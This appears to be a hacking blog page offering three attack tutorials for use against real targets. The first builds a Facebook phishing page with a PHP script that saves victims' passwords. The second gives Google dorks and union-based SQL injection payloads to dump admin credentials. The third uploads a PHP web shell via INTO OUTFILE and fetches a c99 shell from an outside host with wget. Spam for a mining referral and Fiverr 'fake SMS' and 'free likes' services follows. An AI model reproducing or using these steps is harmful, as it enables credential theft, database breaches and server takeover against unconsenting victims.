Salam From HaXor Farhan ( MR-Crack )& (Muslim Shadow)

Salam From  HaXor Farhan ( MR-Crack )& (Muslim Shadow)

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.

3.Now open the notepad and press CTRL+F,and type ACTION.

4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.Now Change the text to post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a Facebook Login Page .

 8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.

12.You have to make a account in that.
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .


 16.Now the last step click on view of index.htm it will look same as facebook page.
 17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.

20.Download Phishing Files 

21.For Password 

Salam From HaXor Farhan ( MR-Crack )& (Muslim Shadow)

Salam From  HaXor Farhan ( MR-Crack )& (Muslim Shadow)

SQL injection is a code injection technique that exploits a security vulnerabilityoccurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.SQL injection attacks are also known as SQL insertion attacks.


Step-by-Step tutorial for SQL Injection

Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we'll provide a list of vulnerable sites.

Dorks:

Code:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

and you can also write your own.

How to check if a webpage is vulnerable to this attack???
Once you execute the dorks and get the preferred search results. Say for example
hxxp://www.website.com/index.php?catid=1

Add a ' (apos) at the end of the URL. Such that the URL looks like
hxxp://www.website.com/index.php?catid=1'

If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

Step 2: Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
eg. hxxp://www.website.com/index.php?catid=1 order by 1

Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.

Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns. 
eg. hxxp://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6

Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns. 

Step 3: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.

eg. hxxp://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6

You'll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.

Step 4: Expolit
To get list of databases:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.
Result: information_schema,vrk_mlm

To know the current database in use:
hxxp://www.website.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm

To get the current user:
hxxp://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost

To get the tables:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users

We'll concentrate our attack on the users table.

To get the columns:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName​​,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by​​_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address

By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.

Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refe​​red_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--

Now you Will Get the Admin User name And Password 

Salam From HaXor Farhan ( MR-Crack )& (Muslim Shadow)

Salam From  HaXor Farhan ( MR-Crack )& (Muslim Shadow)

First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.

You need 2 main things:

1. Root Path of the website 
2. A Writable Directory 

Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327

 Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.

www.site.com/index.php?id=10'

I am not starting with abc of SQLI I hope u know the basics.
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user Ch3rn0by1
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.

Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

now we have our webserver etc (/home/Ch3rn0by1)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--

Where Ch3rn0by1 is your webserver software name like server name.conf .

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D

site www.site.com/dir/*/*/*/*/

so its site.com/ch3rn0by1/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+

ok now we have to execute our commands

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use wget command to upload our evil script

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

EARN BTC / DOGE / PAYPAL DOLLARS

EARN BTC / DOGE / PAYPAL DOLLARS [FREE]

Introducing you with a new mining site.

Why use Cointellect?

Cointellect offer free Dogecoin mining also their service allow users to purchase hashing power and enable miners to contribute to a pool.
Besides thats you have 10% affiliate commission even your ref. is just free miner.

  

    How to get started ?

 1- Go and create an account here : http://cointellect.com/?code=b5a331c4

2- Confirm your account via "Activation Email" ...

3- Now Download software from there, Install and then run it in your PC / RDP...

Personally telling you that I am running this software in my many RDPs.. So earning many euros from it. :D

 Earning Proof:

Exchange Dogecoin to Bitcoin: 

1- You can use exchangers site to convert your Dogecoins to Bitcoins Simply.

For example this site: https://bter.com/

Some tips for earn more with Cointellect:

1-  End task unnecessary programs that run background.

2- Don't forget to use invitation code so you can get your first coin soon.

Thanks! I hope you Enjoyed it... :) 

Fake Sms Message Or Anonyomus Msg

• I will Tell You the Method How To Send Fake Sms...

• You can send sms All Over the World.

• you can send Unlimited msg.

• The Best Thing Is (You can send Sms From Any Name Or Number)

• So What R u Wating For??

Order Now...

http://www.fiverr.com/mrhamxa/anonymous-message-or-fake-sms

How To Get Free Facebook Likes

            
 HElloo... :)
Today I am share a trick to How To Get Free Facebook Likes.Photo,,Status,,Page Liker And Auto Commnter.. Here you don’t need any technical knowledge....Go to this Link.

                                                                       http://www.fiverr.com/mrhamxa

                    

How To Make Nameless Invisible Facebook Profile Name

HElloo... :)
Today I am share a trick to make a nameless Facebook profile name. Here you don’t need any technical knowledge...Go this Link And Buy This Method/.......
         
           http://www.fiverr.com/mrhamxa